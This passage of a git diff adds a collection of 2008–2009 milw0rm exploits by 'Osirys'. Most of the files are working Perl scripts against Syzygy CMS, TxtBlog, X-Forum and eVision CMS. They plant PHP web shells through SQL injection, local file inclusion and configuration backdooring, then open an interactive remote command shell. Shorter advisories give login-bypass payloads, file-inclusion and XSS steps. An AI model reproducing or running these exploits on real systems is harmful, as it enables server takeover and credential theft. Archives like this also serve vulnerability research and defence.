..\n"; + my $attack = $host."/index.php?page=poll.php&poll=-1 union select 1,'".$code."',0,0,0,0,0,0,0,0,0,0,0,0,0,0 into outfile '".$file."'"; + get_req($attack); + + print "[*] Spawning remote Shell via LFI ..\n\n"; + $way = 1; + &exec_cmd; +} + +sub exploit_2 { + print "\n[++] Exploiting via SQL Command Injection !\n[*] Generating error through GET request ..\n"; + get_req($host."/osirys_log_test".$rand); + + print "[*] Cheeking Apache Error Log path ..\n"; + + while (($log = <@error_logs>)&&($gotcha != 1)) { + $tmp_path = $host."/index.php?page=poll.php&poll=-1 union select 1,load_file('".$log."'),0,0,0,0,0,0,0,0,0,0,0,0,0,0"; + $re = get_req($tmp_path); + if ($re =~ /File does not exist: (.+)\/osirys_log_test$rand/) { + $site_path = $1."/"; + $gotcha = 1; + print "[*] Error Log path found -> $log\n"; + print "[*] Website path found -> $site_path\n"; + } + } + + $gotcha == 1 || die "[-] Couldn't file error_log !\n"; + + my $attack = $host."/index.php?page=poll.php&poll=-1 union select 1,'".$code."',0,0,0,0,0,0,0,0,0,0,0,0,0,0 into outfile '".$site_path."/files/1337.php'"; + get_req($attack); + my $test = get_req($host."/files/1337.php"); + if ($test =~ /0xExec/) { + print "[*] Shell succesfully injected !\n"; + print "[&] Hi my master, do your job now [!]\n\n"; + $exec_path = $host."/shell.php"; + $way = 2; + &exec_cmd; + } + else { + print "[-] Shell not found \n[-] Exploit failed\n\n"; + exit(0); + } +} + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + if ($way == 1) { + $exec_url = $host.$lfi.$file."%00&cmd=".$cmd; + } + elsif ($way == 2) { + $exec_url = $host."/files/1337.php?cmd=".$cmd; + } + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ /0xExec(.+)ExeCx0/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return($response->content); +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.+)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.+)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return($full_det); +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " --------------------------------- \n". + " Syzygy CMS 0.3 RCE sploit \n". + " by Osirys \n". + " --------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-03-23] \ No newline at end of file diff --git a/TxtBlog 1.0 Alpha - Remote Command Execution.pl b/TxtBlog 1.0 Alpha - Remote Command Execution.pl new file mode 100644 index 0000000..b532a12 --- /dev/null +++ b/TxtBlog 1.0 Alpha - Remote Command Execution.pl @@ -0,0 +1,204 @@ +#!/usr/bin/perl + +# ----------------------------------------------------------------------------- +# INFORMATIONS +# ----------------------------------------------------------------------------- + +# App => TxtBlog v 1.0 Alpha +# Downl => http://downloads.sourceforge.net/txtblogcms/txtblogcms-1.0a.zip + +# Remote Command Execution Exploit +# by Osirys +# osirys[at]autistici[dot]org +# osirys.org + +# I wrote this simple RCE exploit, just becouse by default the blog +# administration password is disabled. So, from admin panel, we can +# create .php files. + +# Tested with: Magic Quotes => Off + +# ------------------------------------------------------------------ +# Exploit in action [>!] +# ------------------------------------------------------------------ +# osirys[~]>$ perl rce_bleah.txt http://localhost/txtblogcms-1.0a/ + +# --------------------------- +# TxtBlog RCE Exploit +# by Osirys +# --------------------------- + +# [+] Creating RCE file .. +# [+] RCE Created ! +# [+] File found ! +# [+] Hi my master, do your job now [!] + +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> whoami +# apache +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]> +# ------------------------------------------------------------------ + +use LWP::UserAgent; +use IO::Socket; +use HTTP::Request::Common; + +my $adm_path = "/admin/index.php"; +my $rce_crea = $adm_path."?page=create"; +my $host = $ARGV[0]; + + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +my $url = $host.$adm_path; +my $test = get_req($url); + +if ($re !~ /Welcome to the administration/) { + my $url = $path.$rce_crea; + my $code = "title=new+page&blog=%27%3B+%20echo+%22Osirys%3Cbr%3E%22;+system%28%24_GET%5Bcmd%5D%29%3B+%24a+%3D+%27&location=&Submit=Save"; + my $length = length($code); + my $data = "POST ".$url." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $code."\r\n"; + + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + + print "[+] Creating RCE file ..\n"; + $socket->send($data); + + while ((my $e = <$socket>)&&($own != 1)) { + if ($e =~ /Your new blog has been saved/) { + $own = 1; + print "[+] RCE Created ! \n"; + } + } + $own == 1 || die "[-] Can't write new file\n"; + + $mfile = &find_file; + print "[+] Hi my master, do your job now [!]\n\n"; + &exec_cmd; + +} +else { + print "[-] Administration requires password !\n"; + exit(0); +} + +sub find_file { + my $year = (localtime)[5] + 1900; + my $month = (localtime)[4]; + my $day = (localtime)[3]; + if ($month =~ /[0-9]{1}/) { $month =~ s/([0-9]{1})/0$1/; } + if ($day =~ /[0-9]{1}/) { $day =~ s/([0-9]{1})/0$1/; } + for ($i = 0;$i <= 15; $i++) { + my $url = $host."/data/".$year."/".$month."/".$day."-".$i.".php"; + my $re = get_req($url); + if ($re =~ /Osirys
/) { + $g0t = 1; + print "[+] File found !\n"; + $file_path = $url; + return($file_path); + } + } + if ($g0t != 1) { + print "[-] Can't find evil file !\n"; + exit(0); + } +} + +sub exec_cmd { + my @outs; + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = $mfile."?cmd=".$cmd; + $re = get_req($exec_url); + if ($re =~ /Osirys
(.)/) { + push(@outs,$re); + foreach my $o(@outs) { + $o =~ s/Osirys
//; + print "$o"; + } + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub banner { + print "\n". + " --------------------------- \n". + " TxtBlog RCE Exploit \n". + " by Osirys \n". + " --------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-03] + \ No newline at end of file diff --git a/WebFileExplorer 3.1 - Authentication Bypass.txt b/WebFileExplorer 3.1 - Authentication Bypass.txt new file mode 100644 index 0000000..514039e --- /dev/null +++ b/WebFileExplorer 3.1 - Authentication Bypass.txt @@ -0,0 +1,64 @@ +Product Name: WebFileExplorer +Version : 3.1 +URL : http://www.webfileexplorer.com/ +Price : 99 $ USD + +Credits to : Giovanni Buzzin, "Osirys" + osirys[at]autistici[dot]org + +WebFileExplorer v3.1, is prone to multiple vulnerabilities. At first, an attacker can inject his evil sql code +in the login form, bypassing it, he just needs to know the nick of an existent username to login as him. +Live Exploiting: http://www.webfileexplorer.com/userdemo/ +Headers: +http://www.webfileexplorer.com/userdemo/body.asp + +POST /userdemo/body.asp HTTP/1.1 +Host: www.webfileexplorer.com +User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-us,en;q=0.5 +Accept-Encoding: gzip,deflate +Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 +Keep-Alive: 300 +Connection: keep-alive +Referer: http://www.webfileexplorer.com/userdemo/body.asp +Cookie: ASPSESSIONIDSCQCBDQR=CDMBDPMCINOGGDFHIFOJOLGL +Content-Type: application/x-www-form-urlencoded +Content-Length: 71 +login_name=&dologin=yes&id=admin%27+or+%271%3D1&pwd=osirysp0wa&B1=Login + +Sending this request a remote attacker is able to bypass the login form. +The sql injection used is: admin%27+or+%271%3D1 +so : admin' or '1=1 + +Once the attacker logged in, from the Control Panel he's able to do a lot of things, upload all file of any +extension, create files of any type, and so on. So this normal Authority Bypass can become a dangerous +Arbitrary Shell Upload, so kinda of Remote Command Execution. + +Headers: + +http://www.webfileexplorer.com/userdemo/body.asp?action=savefile&path=/admindemo/demo/er + +POST /userdemo/body.asp?action=savefile&path=/admindemo/demo/er HTTP/1.1 +Host: www.webfileexplorer.com +User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-us,en;q=0.5 +Accept-Encoding: gzip,deflate +Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 +Keep-Alive: 300 +Connection: keep-alive +Referer: http://www.webfileexplorer.com/userdemo/body.asp?action=newfile +Cookie: ASPSESSIONIDSCQCBDQR=CDMBDPMCINOGGDFHIFOJOLGL; ControlPan=max; fileoptions=max; folderoptions=max; SearchBoxStat=max; FoldersTree=off +Content-Type: application/x-www-form-urlencoded +Content-Length: 96 +file=test_.php&newfilestuff=%3C%3Fphp+echo+%22I%27m+horn%3Cbr%3E%22%3B+%3F%3E&submit=create+file + +Let's see now, the response of the created file: + +osirys[~]>$ perl asd.txt http://www.webfileexplorer.com/admindemo/demo/er/test_.php I'm horn
+osirys[~]>$ + +Game Over. + +# milw0rm.com [2009-04-09] \ No newline at end of file diff --git a/WorkSimple 1.2.1 - Remote File Inclusion Sensitive Data Disclosure.txt b/WorkSimple 1.2.1 - Remote File Inclusion Sensitive Data Disclosure.txt new file mode 100644 index 0000000..f292af7 --- /dev/null +++ b/WorkSimple 1.2.1 - Remote File Inclusion Sensitive Data Disclosure.txt @@ -0,0 +1,49 @@ +[START] + +######################################################################################### +[0x01] Informations: + +Script : WorkSimple 1.2.1 +Download : http://www.hotscripts.com/jump.php?listing_id=85112&jump_type=1 +Vulnerability : Remote File Inclusion / Sensitive Data Disclosure +Author : Osirys +Contact : osirys[at]live[dot]it +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay + + +######################################################################################### +[0x02] Bug:[Remote File Inclusion] +###### + +Bugged file is: /[path]/calendar.php + +[CODE] + + +[/CODE] + +$lang variable is not declared, I thought it was declared on conf.php, but it's not. +So we can set the $lang value directly from GET. + +FIX : Just declare $lang, for example in /[path]/data/conf.php + + +[!] EXPLOIT: /[path]/calendar.php?lang=[remote_txt_shell] + +######################################################################################## +[0x03] Bug:[Sensitive Data Disclosure] +###### + +In this cms, when an user register himself, the cms puts informations like username and +password on a .txt file. So, just going on it, we can get sensitive data like username +and passoword. username:md5_hash + + +[!] EXPLOIT: /[path]/data/usr.txt + +######################################################################################### + +[/END] + +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/X-Forum 0.6.2 - Remote Command Execution.pl b/X-Forum 0.6.2 - Remote Command Execution.pl new file mode 100644 index 0000000..3e429f1 --- /dev/null +++ b/X-Forum 0.6.2 - Remote Command Execution.pl @@ -0,0 +1,317 @@ +#!/usr/bin/perl + +# Web App: X-Forum 0.6.2 +# Link : http://freefr.dl.sourceforge.net/sourceforge/x-forum/xforum-0.6.2.tar.gz +# Bug : Auth Bypass via Cookie Handling +# : There are also other SQL Injections + +# Remote Command Execution Exploit +# Credits to Giovanni Buzzin, "Osirys" +# Mail osirys[at]autistici[dot]org + +# It logs in using an SQL Inj (AUTH BYPASS) via Cookie, then edits the configuration +# putting in it the backdoor. Needs the nick of the admin ! + +# --------------------------------------------------------------------------- +# Sploit +# --------------------------------------------------------------------------- +# osirys[~]>$ perl spll.txt http://localhost/x-forum/xforum/ admin +# +# ---------------------------- +# X-Forum RCE Exploit +# Coded by Osirys +# ---------------------------- +# +# [*] Bypassing Admin Login with a evil cookie ! +# [*] Admin Login Bypassed .. +# [*] Getting previous configuration .. +# [*] Previous configuration loaded .. +# [*] Overwriting ..... +# [*] Configuration edited, backdoored !! +# [*] Shell succesfully spawned !! +# [:D Hi myLord, execute your commands !! +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/x-forum/xforum +# shell[localhost]$> exit +# [-] Quitting .. +# +# osirys[~]>$ +# --------------------------------------------------------------------------- + +use HTTP::Request; +use LWP::UserAgent; +use IO::Socket; + +my $host = $ARGV[0]; +my $user = $ARGV[1]; +my $rce_p = "/Config.php?cmd="; +my @conf = (); + +chomp($user); +$user =~ s/\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg; +$user =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg; + +$cookie = "cookie_username=".$user."' or '1=1; cookie_password=p0wa"; + +help("-1") unless (($host)&&($user)); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_data($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +print "[*] Bypassing Admin Login with a evil cookie !\n"; +socket_req("GET",$path."/Configure.php",$cookie,"Manage Boards",1); +if ($gotcha == 1) { + print "[*] Admin Login Bypassed ..\n"; +} +else { + print "[-] Bad admin's nick or site not vulnerable !\nn"; + exit(0); +} +print "[*] Getting previous configuration ..\n"; +socket_req("GET",$path."/Configure.php",$cookie,"",2); + +if (scalar(@conf) == 23) { + print "[*] Previous configuration loaded ..\n"; +} +print "[*] Overwriting .....\n"; + +my $post = "serverName=".$conf[0]."&userName=".$conf[1]."&password=".$conf[2]."&databaseName=".$conf[3]. + "&iconsDir=".$conf[4]."&buttonsDir=".$conf[5]."&emailPassword=FALSE&uniqueEMail=TRUE&member". + "Level=0&memberStatus=1&memberGroup=1&threadStatus=1&postStatus=1&forumName=".$conf[6]."&ic". + "onsPerRow=".$conf[7]."&boardImage=". $conf[8]."&boardImageNew=". $conf[9] ."&categoryImage=" + .$conf[10] ."&categoryImageNew=" . $conf[11] ."&threadImage=". $conf[12] . "&threadImageNew=" + .$conf[13]."&backColor=".$conf[14]."&textColor=".$conf[15]."&fontFace=".$conf[16]."&linkCol". + "or=".$conf[17]."&borderColor=". $conf[18]."&titleColor=".$conf[19]."&bodyColor=". $conf[20]. + "&adminEMail=".$conf[21]."%22%29%3Becho+%22sp4wn%3Cbr%3E%22%3Bsystem%28%24_GET%5Bcmd%5D%29%". + "3Bdefine%28%22p0wa%22%2C%22lol&logoutURL=".$conf[22]."&submit=Update+Configuration"; + + +$post =~ s/,/%2C/g; +$post =~ s/ /+/g; +$post =~ s/#/%23/g; +$post =~ s/@/%40/g; + +socket_req("POST",$path."/SaveConfig.php",$cookie,$post,0,"",1); + +my $exec_url = ($host.$rce_p); +my $re = get_req($exec_url); +if ($re =~ /sp4wn/) { + print "[*] Configuration edited, backdoored !!\n[*] Shell succesfully spawned !!\n[:D Hi myLord, execute your commands !!\n\n"; + &exec_cmd; +} +else { + print "[-] Something wrong, sploit failed !\n\n"; + exit(0); +} + +sub socket_req() { + my($request,$path,$cookie,$content,$opt,$regexp,$sock_opt) = @_; + my $stop; + my $length = length($content); + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die $!; + + if ($sock_opt == 1) { + $opt_1 = "Referer: ".$host."/Configure.php\r\n"; + $opt_2 = "Content-Type: application/x-www-form-urlencoded\r\n"; + } + else { + $opt_1 = ""; + $opt_2 = ""; + } + my $data = $request." ".$path." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + $opt_1. + "Cookie: ".$cookie."\r\n". + $opt_2. + "Content-Length: ".$length."\r\n\r\n". + $content."\r\n"; + + $socket->send($data); + while ((my $e = <$socket>)&&($stop != 1)) { + if ($opt == 0) { + $stop = 1; + } + elsif ($opt == 1) { + if ($e =~ /$regexp/) { + ($stop,$gotcha) = (1,1); + } + } + elsif ($opt == 2) { + get_previous_conf($e); + } + } +} + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n\n"; + $exec_url = $host.$rce_p.$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ m/sp4wn
(.+)/g) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.+)/) { + return 1; + } + else { + return 0; + } +} + +sub get_data() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $h0st !~ /www/ || $h0st =~ s/www\.//; + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub get_previous_conf() { + my $string = $_[0]; + if ($string =~ /name="serverName" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="userName" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="password" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="databaseName" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="iconsDir" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="buttonsDir" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="forumName" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="iconsPerRow" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="boardImage" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="boardImageNew" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="categoryImage" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="categoryImageNew" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="threadImage" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="threadImageNew" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="backColor" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="textColor" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="fontFace" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="linkColor" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="borderColor" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="titleColor" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="bodyColor" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="adminEMail" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="logoutURL" size="60" value="(.+)">/) { + push(@conf,$1); + } +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " ---------------------------- \n". + " X-Forum RCE Exploit \n". + " Coded by Osirys \n". + " ---------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad Input!\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path admin_username\n"; + print " admin_username is the nick of the admin.\n\n"; + exit(0); +} + +# milw0rm.com [2009-03-30] \ No newline at end of file diff --git a/eVision CMS 2.0 - Remote Code Execution.pl b/eVision CMS 2.0 - Remote Code Execution.pl new file mode 100644 index 0000000..29ad08f --- /dev/null +++ b/eVision CMS 2.0 - Remote Code Execution.pl @@ -0,0 +1,189 @@ +#!/usr/bin/perl + +# ----------------------------------------------------------------------------- +# INFORMATIONS +# ----------------------------------------------------------------------------- + +# eVision CMS 2.0 +# http://kent.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz +# Remote Command Execution Exploit +# by Osirys +# osirys[at]live[dot]it +# Greets to: evilsocket, DarkJoker, emgent, Jay and str0ke + +# This cms is vulnerable to arbitrary file upload. The problem is that when +# the user uploads a file, on it will be added the .gif extension. but this +# cms is vulnerable to Local File Inclusion,so we can include the .gif file +# and execute it. + +# ------------------------------------------------------------------ +# Exploit in action :D +# ------------------------------------------------------------------ +# osirys[~]>$ perl rcE.txt http://localhost/eVision-2.0/ +# +# --------------------------- +# eVision CMS RCE Exploit +# Coded by Osirys +# --------------------------- + +# [+] Evil php code uploaded ! +# [+] Including now evil file with LFI vulnerability +# [+] Injection succesfully ! Remote Command execution works ! + +# shell[localhost]$> whoami +# apache +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/eVision-2.0/modules/tour/adminpart +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]>$ +# ------------------------------------------------------------------ + +use LWP::UserAgent; +use IO::Socket; +use HTTP::Request::Common; + +my $img_up_path = "/modules/brandnews/adminpart/img_upload.php"; +my $up_path = "/modules.conf/brandnews/showpart/icons/"; +my $lfi_path = "/modules/tour/adminpart/addtour.php?module="; +my $rce_path = "../../../modules.conf/brandnews/showpart/icons/"; +my $vuln_code = ""; +my $lfile = "osi.txt"; +my $nfile = "osirys.txt"; +my $host = $ARGV[0]; + + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +open ($file, ">>", $lfile); +print $file "$vuln_code\n"; +close($file); + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + + +my $url = $host.$img_up_path; +my $ua = LWP::UserAgent->new; +my $re = $ua->request(POST $url, + Content_Type => 'form-data', + Content => [ + upload_img => [$lfile, Content_Type => 'text/plain'], + upload_label => $nfile, + upload_submit => 'Upload' + ] + ); + +unlink($lfile); + +if ($re->is_success){ + my $t_re = get_req($host.$up_path.$nfile.".gif"); + if ($t_re =~ /<\?php/) { + print "[+] Evil php code uploaded !\n"; + print "[+] Including now evil file with LFI vulnerability\n"; + my $re = get_req($host.$lfi_path.$rce_path.$nfile.".gif%00&cmd=id"); + if ($re =~ /uid/) { + print "[+] Injection succesfully ! Remote Command execution works !\n\n"; + $lfi_rce = $host.$lfi_path.$rce_path.$nfile.".gif%00&cmd="; + &exec_cmd; + } + else { + print "[-] Something goes wrong !\n"; + print "[-] Exploit Failed\n\n"; + exit(0); + } + } + else { + print "[-] Upload failed\n"; + print "[-] Exploit Failed\n\n"; + exit(0); + } +} +else { + print "[-] Unable to upload evil file !\n"; + print "[-] Exploit Failed\n\n"; + exit(0); +} + +sub exec_cmd { + my @outs; + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = ($lfi_rce.$cmd); + $re = get_req($exec_url); + if ($re =~ /(.)/) { + push(@outs,$re); + foreach my $o(@outs) { + print "$o"; + } + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub banner { + print "\n". + " --------------------------- \n". + " eVision CMS RCE Exploit \n". + " Coded by Osirys \n". + " --------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-02] \ No newline at end of file diff --git a/myPHPscripts Login Session 2.0 - Cross-Site Scripting Database Disclosure.txt b/myPHPscripts Login Session 2.0 - Cross-Site Scripting Database Disclosure.txt new file mode 100644 index 0000000..f85adff --- /dev/null +++ b/myPHPscripts Login Session 2.0 - Cross-Site Scripting Database Disclosure.txt @@ -0,0 +1,76 @@ +[START] + +#################################################################################################################### +[0x01] Informations: + +Script : myPHPscripts Login Session 2.0 +Download : http://www.hotscripts.com/jump.php?listing_id=69881&jump_type=1 +Vulnerability : XSS / Database Disclosure +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + + +#################################################################################################################### +[0x02] Bug: [XSS] +###### + +Bugged file is: /[path]/login.php + +[CODE] + +if ($u_invalid == 1) { $errors[] = "User $user is invalid. 3-15 alphanumeric characters required."; } + +[/CODE] + +If the username that we typed in the register form is invalid, it will directly appear in the html code. +So we just have to put a js code, like an alert, and we will get a XSS. + +[!] FIX: Filter or validate $user before printing it in html code. + + +[!] EXPLOIT: + 1) Go at: /[path]/login.php?ls_register + 2) In User form put a js code. (ex: ) + 3) Field the other forms, and press register button. + +#################################################################################################################### +[0x03] Bug: [Database Disclosure] +###### + +Bugged file is: /[path]/login.php + +[CODE] + + if (empty($errors)) { + $newline = $records++; + $e_email = base64_encode($email); + $data = "$newline||$user||$e_email||$pass\n"; + $fh = fopen($users, 'a') or die("Can't open user database."); + fwrite($fh, $data); + fclose($fh); +?> + +[/CODE] + +This cms uses a flat database, a .txt file where it stores usernames,passwords and emails of the registered +users. + +[!] FIX: Don't use this kind of authentication :) + + +[!] EXPLOIT: /[path]/users.txt + + Informations are printed in this way: + 0||admin||b3NpcnlzQGxpdmUuaXQ=||6e1459df459890dfd8b4c3687c18abba + 1||cazzone||bG9sQGxvbC5pdA==||b7dba5a1bc3605a87b59ac8147512c97 + + user_number||username||email(base64 encrypted)||password(md5 encrypted) + +#################################################################################################################### + +[/END] + +# milw0rm.com [2008-12-19] \ No newline at end of file diff --git a/phosheezy 2.0 - Remote Command Execution.pl b/phosheezy 2.0 - Remote Command Execution.pl new file mode 100644 index 0000000..e01a66c --- /dev/null +++ b/phosheezy 2.0 - Remote Command Execution.pl @@ -0,0 +1,211 @@ +#!/usr/bin/perl + +# phosheezy 2.0 +# http://www.ryneezy.net/apps/phosheezy/phosheezy-v0.2.tar.gz +# Remote Command Execution Exploit +# by Osirys +# osirys[at]live[dot]it +# osirys.org +# Greets: r00t, x0r, jay, BlackLight +# lol at athos + +# -------------------------------------------------------------- +# Exploit in action :D +# -------------------------------------------------------------- +# osirys[~]>$ perl exp.txt http://localhost/phosheezy/ +# +# ---------------------------- +# Phosheezy RCE Exploit +# Coded by Osirys +# ---------------------------- +# +# [+] Admin password found: +# Sha1 pwd: 8942c747dc48c47a6f7f026df85a448046348a2c +# [+] Grabbing server headers to get a valid SESSION ID .. +# [+] SESSION ID grabbed: 3srqiuh8jrttt73tbd7j5uvhi2 +# [+] 